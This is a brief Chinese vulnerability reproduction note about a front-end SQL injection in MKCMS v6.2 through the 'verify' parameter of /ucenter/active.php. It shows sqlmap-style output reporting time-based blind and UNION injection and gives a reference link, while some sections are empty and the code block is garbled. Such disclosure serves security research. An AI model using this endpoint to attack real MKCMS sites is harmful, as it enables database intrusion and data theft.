004-MKCMS v6.2 :ucenter:active.php前台sql注入漏洞

# MKCMS v6.2 /ucenter/active.php前台sql注入漏洞

### 一、漏洞简介

### 二、漏洞影响

MKCMS v6.2

### 三、复现过程

/ucenter/active.php?verify=1存在注入

“`php
/ucenter/active.php
= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[INFO] GET parameter ‘verify’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
“`

参考链接

https://xz.aliyun.com/t/7580#toc-4

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容